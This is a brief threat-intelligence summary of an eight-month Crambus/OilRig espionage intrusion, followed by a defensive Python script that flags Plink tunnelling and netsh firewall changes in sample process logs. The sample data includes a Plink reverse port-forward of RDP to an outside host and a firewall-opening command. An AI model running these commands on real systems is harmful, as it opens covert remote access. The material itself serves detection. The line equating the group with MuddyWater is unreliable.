The Iranian espionage group known as Crambus, also known as OilRig, MuddyWater, and APT34, conducted an extensive intrusion against a Middle Eastern government for eight months, from February to September 2023. The attackers stole files and passwords and planted a PowerShell backdoor called PowerExchange, which allowed them to monitor incoming emails on an Exchange Server and execute commands sent via email.
They also deployed backdoors and keyloggers on several computers. To gain remote access, the attackers used the network administration tool Plink to configure port-forwarding rules and modified Windows firewall rules. Crambus has a history of targeting various countries, including Saudi Arabia, Israel, the United Arab Emirates, Iraq, Jordan, Lebanon, Kuwait, Qatar, Albania, the US, and Turkey. The group is known for long-running intelligence-gathering operations and has recently incorporated social engineering into its attacks.
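As an added example (not from the report, and not tooling of the group or of any vendor), a small Python triage routine that flags the two remote-access techniques described above, Plink tunnelling and firewall rule changes, in constructed process-creation records. The `user|image|command line` record format, the file paths and the hosts are assumptions made for the example.

```python
import re

# Constructed sample process-creation events in an assumed "user|image|command line"
# format. They mimic the Plink port-forwarding and firewall changes the report describes.
SAMPLE_EVENTS = [
    "CORP\\svc_backup|C:\\Users\\Public\\plink.exe|plink.exe -N -R 0.0.0.0:3389:127.0.0.1:3389 -P 443 u@203.0.113.7",
    "CORP\\admin|C:\\Windows\\System32\\netsh.exe|netsh advfirewall firewall add rule name=\"RDP\" dir=in action=allow protocol=TCP localport=3389",
    "CORP\\alice|C:\\Windows\\System32\\notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt",
    "CORP\\bob|C:\\Tools\\plink.exe|plink.exe -ssh -P 22 u@10.0.0.5",  # plain interactive session, no tunnel
]

# Plink switches that set up remote, local or dynamic port forwarding (documented PuTTY flags).
PLINK_TUNNEL_FLAGS = {"-R", "-L", "-D"}
# Locations an attacker-dropped binary commonly runs from; assumed list, tune to the environment.
STAGING_DIRS = ("c:\\users\\public", "c:\\programdata", "c:\\windows\\temp")
FIREWALL_CHANGE = re.compile(r"advfirewall\s+firewall\s+(add|set|delete)\s+rule", re.I)


def classify(event):
    """Return the user and a list of findings for one process-creation record."""
    user, image, cmdline = event.split("|", 2)
    argv = cmdline.split()
    image_l = image.lower()
    findings = []
    if image_l.endswith("\\plink.exe"):
        if any(arg in PLINK_TUNNEL_FLAGS for arg in argv):
            findings.append("plink port-forwarding tunnel")
        if image_l.startswith(STAGING_DIRS):
            findings.append("plink launched from writable staging directory")
    if image_l.endswith("\\netsh.exe") and FIREWALL_CHANGE.search(cmdline):
        findings.append("windows firewall rule changed via netsh")
    return {"user": user, "findings": findings}


def triage(events):
    """Return (user, findings) for every record that produced at least one finding."""
    hits = []
    for event in events:
        result = classify(event)
        if result["findings"]:
            hits.append((result["user"], result["findings"]))
    return hits


if __name__ == "__main__":
    for user, findings in triage(SAMPLE_EVENTS):
        print(user, "->", "; ".join(findings))
```

Correlating a Plink tunnel with a firewall rule change on the same host within a short window is the stronger signal; either alone also appears in legitimate administration.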
During this particular attack, Crambus deployed three previously unseen pieces of malware and made use of legitimate tools such as Mimikatz and Plink. The attackers' activity was first detected in February 2023, and their malicious actions continued throughout the following months, targeting multiple computers and servers.